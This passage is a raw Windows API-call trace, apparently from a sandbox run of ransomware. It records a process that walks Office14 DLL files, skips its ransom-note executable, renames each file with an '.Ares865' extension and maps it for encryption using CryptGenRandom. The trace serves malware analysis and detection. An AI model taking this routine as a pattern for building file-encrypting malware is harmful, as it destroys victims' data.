nFileSizeLow=0xd388, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AUTHZAX.DLL", cAlternateFileName="")) returned 1 [0128.910] lstrcmpiW (lpString1="AUTHZAX.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.910] lstrcmpiW (lpString1="AUTHZAX.DLL", lpString2="aoldtz.exe") returned 1 [0128.910] lstrcpyW (in: lpString1=0x2cce462, lpString2="AUTHZAX.DLL" | out: lpString1="AUTHZAX.DLL") returned="AUTHZAX.DLL" [0128.910] lstrlenW (lpString="AUTHZAX.DLL") returned 11 [0128.910] lstrlenW (lpString="Ares865") returned 7 [0128.910] lstrcmpiW (lpString1="ZAX.DLL", lpString2="Ares865") returned 1 [0128.910] lstrlenW (lpString=".dll") returned 4 [0128.910] lstrcmpiW (lpString1="AUTHZAX.DLL", lpString2=".dll") returned 1 [0128.910] lstrlenW (lpString=".lnk") returned 4 [0128.910] lstrcmpiW (lpString1="AUTHZAX.DLL", lpString2=".lnk") returned 1 [0128.910] lstrlenW (lpString=".ini") returned 4 [0128.910] lstrcmpiW (lpString1="AUTHZAX.DLL", lpString2=".ini") returned 1 [0128.910] lstrlenW (lpString=".sys") returned 4 [0128.910] lstrcmpiW (lpString1="AUTHZAX.DLL", lpString2=".sys") returned 1 [0128.910] lstrlenW (lpString="AUTHZAX.DLL") returned 11 [0128.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.Ares865") returned 68 [0128.911] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll.ares865"), dwFlags=0x1) returned 1 [0128.913] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=54152) returned 1 [0128.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.914] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.914] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.914] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd690, lpName=0x0) returned 0x170 [0128.917] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd690) returned 0x190000 [0128.922] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.923] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.923] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0128.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0128.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0128.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0128.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.923] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.924] CloseHandle (hObject=0x170) returned 1 [0128.924] CloseHandle (hObject=0x118) returned 1 [0128.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.925] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67b88000, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x21b02690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67b88000, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0xdf80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSLaunch.dll", cAlternateFileName="BCSLAU~1.DLL")) returned 1 [0128.925] lstrcmpiW (lpString1="BCSLaunch.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.925] lstrcmpiW (lpString1="BCSLaunch.dll", lpString2="aoldtz.exe") returned 1 [0128.925] lstrcpyW (in: lpString1=0x2cce462, lpString2="BCSLaunch.dll" | out: lpString1="BCSLaunch.dll") returned="BCSLaunch.dll" [0128.925] lstrlenW (lpString="BCSLaunch.dll") returned 13 [0128.925] lstrlenW (lpString="Ares865") returned 7 [0128.925] lstrcmpiW (lpString1="nch.dll", lpString2="Ares865") returned 1 [0128.925] lstrlenW (lpString=".dll") returned 4 [0128.925] lstrcmpiW (lpString1="BCSLaunch.dll", lpString2=".dll") returned 1 [0128.925] lstrlenW (lpString=".lnk") returned 4 [0128.925] lstrcmpiW (lpString1="BCSLaunch.dll", lpString2=".lnk") returned 1 [0128.925] lstrlenW (lpString=".ini") returned 4 [0128.925] lstrcmpiW (lpString1="BCSLaunch.dll", lpString2=".ini") returned 1 [0128.925] lstrlenW (lpString=".sys") returned 4 [0128.925] lstrcmpiW (lpString1="BCSLaunch.dll", lpString2=".sys") returned 1 [0128.925] lstrlenW (lpString="BCSLaunch.dll") returned 13 [0128.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.Ares865") returned 70 [0128.926] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll.ares865"), dwFlags=0x1) returned 1 [0128.929] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.929] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57216) returned 1 [0128.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.930] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.930] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.930] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.931] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe280, lpName=0x0) returned 0x170 [0128.934] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe280) returned 0x190000 [0128.941] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.942] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.942] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0128.942] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0128.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.942] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0128.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0128.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.943] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.943] CloseHandle (hObject=0x170) returned 1 [0128.943] CloseHandle (hObject=0x118) returned 1 [0128.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.944] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8cd1e00, ftCreationTime.dwHighDateTime=0x1cb7123, ftLastAccessTime.dwLowDateTime=0xd2e133c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa8cd1e00, ftLastWriteTime.dwHighDateTime=0x1cb7123, nFileSizeHigh=0x0, nFileSizeLow=0x14768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGRMLNCH.DLL", cAlternateFileName="")) returned 1 [0128.944] lstrcmpiW (lpString1="DGRMLNCH.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.944] lstrcmpiW (lpString1="DGRMLNCH.DLL", lpString2="aoldtz.exe") returned 1 [0128.944] lstrcpyW (in: lpString1=0x2cce462, lpString2="DGRMLNCH.DLL" | out: lpString1="DGRMLNCH.DLL") returned="DGRMLNCH.DLL" [0128.944] lstrlenW (lpString="DGRMLNCH.DLL") returned 12 [0128.944] lstrlenW (lpString="Ares865") returned 7 [0128.944] lstrcmpiW (lpString1="NCH.DLL", lpString2="Ares865") returned 1 [0128.944] lstrlenW (lpString=".dll") returned 4 [0128.944] lstrcmpiW (lpString1="DGRMLNCH.DLL", lpString2=".dll") returned 1 [0128.944] lstrlenW (lpString=".lnk") returned 4 [0128.944] lstrcmpiW (lpString1="DGRMLNCH.DLL", lpString2=".lnk") returned 1 [0128.944] lstrlenW (lpString=".ini") returned 4 [0128.945] lstrcmpiW (lpString1="DGRMLNCH.DLL", lpString2=".ini") returned 1 [0128.945] lstrlenW (lpString=".sys") returned 4 [0128.945] lstrcmpiW (lpString1="DGRMLNCH.DLL", lpString2=".sys") returned 1 [0128.945] lstrlenW (lpString="DGRMLNCH.DLL") returned 12 [0128.945] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.Ares865") returned 69 [0128.945] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll.ares865"), dwFlags=0x1) returned 1 [0128.948] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83816) returned 1 [0128.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.948] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.949] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.949] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.949] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14a70, lpName=0x0) returned 0x170 [0128.950] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14a70) returned 0x190000 [0128.954] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.955] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.955] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0128.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0128.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0128.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0128.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.956] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.956] CloseHandle (hObject=0x170) returned 1 [0128.957] CloseHandle (hObject=0x118) returned 1 [0128.957] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.957] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.957] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.958] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb7c7400, ftCreationTime.dwHighDateTime=0x1cbc9fa, ftLastAccessTime.dwLowDateTime=0xadbb9ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xeb7c7400, ftLastWriteTime.dwHighDateTime=0x1cbc9fa, nFileSizeHigh=0x0, nFileSizeLow=0x406590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GROOVEEX.DLL", cAlternateFileName="")) returned 1 [0128.958] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.958] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="aoldtz.exe") returned 1 [0128.959] lstrcpyW (in: lpString1=0x2cce462, lpString2="GROOVEEX.DLL" | out: lpString1="GROOVEEX.DLL") returned="GROOVEEX.DLL" [0128.959] lstrlenW (lpString="GROOVEEX.DLL") returned 12 [0128.959] lstrlenW (lpString="Ares865") returned 7 [0128.959] lstrcmpiW (lpString1="EEX.DLL", lpString2="Ares865") returned 1 [0128.959] lstrlenW (lpString=".dll") returned 4 [0128.959] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2=".dll") returned 1 [0128.959] lstrlenW (lpString=".lnk") returned 4 [0128.959] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2=".lnk") returned 1 [0128.959] lstrlenW (lpString=".ini") returned 4 [0128.959] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2=".ini") returned 1 [0128.959] lstrlenW (lpString=".sys") returned 4 [0128.959] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2=".sys") returned 1 [0128.959] lstrlenW (lpString="GROOVEEX.DLL") returned 12 [0128.959] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.Ares865") returned 69 [0128.959] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll.ares865"), dwFlags=0x1) returned 1 [0128.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4220304) returned 1 [0128.962] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.963] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.963] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x406890, lpName=0x0) returned 0x170 [0128.965] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x6890) returned 0x190000 [0129.077] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.079] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.079] CloseHandle (hObject=0x170) returned 1 [0129.079] CloseHandle (hObject=0x118) returned 1 [0129.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.089] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528b28a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528b28a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0129.089] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0129.089] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a783200, ftCreationTime.dwHighDateTime=0x1cbceff, ftLastAccessTime.dwLowDateTime=0xae0eeec0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5a783200, ftLastWriteTime.dwHighDateTime=0x1cbceff, nFileSizeHigh=0x0, nFileSizeLow=0x2ff60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEAWSDC.DLL", cAlternateFileName="")) returned 1 [0129.089] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.089] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="aoldtz.exe") returned 1 [0129.089] lstrcpyW (in: lpString1=0x2cce462, lpString2="IEAWSDC.DLL" | out: lpString1="IEAWSDC.DLL") returned="IEAWSDC.DLL" [0129.089] lstrlenW (lpString="IEAWSDC.DLL") returned 11 [0129.089] lstrlenW (lpString="Ares865") returned 7 [0129.089] lstrcmpiW (lpString1="SDC.DLL", lpString2="Ares865") returned 1 [0129.089] lstrlenW (lpString=".dll") returned 4 [0129.090] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2=".dll") returned 1 [0129.090] lstrlenW (lpString=".lnk") returned 4 [0129.090] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2=".lnk") returned 1 [0129.090] lstrlenW (lpString=".ini") returned 4 [0129.090] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2=".ini") returned 1 [0129.090] lstrlenW (lpString=".sys") returned 4 [0129.090] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2=".sys") returned 1 [0129.090] lstrlenW (lpString="IEAWSDC.DLL") returned 11 [0129.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.Ares865") returned 68 [0129.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll.ares865"), dwFlags=0x1) returned 1 [0129.093] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.094] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196448) returned 1 [0129.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.094] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.095] CryptGenRandom (in: 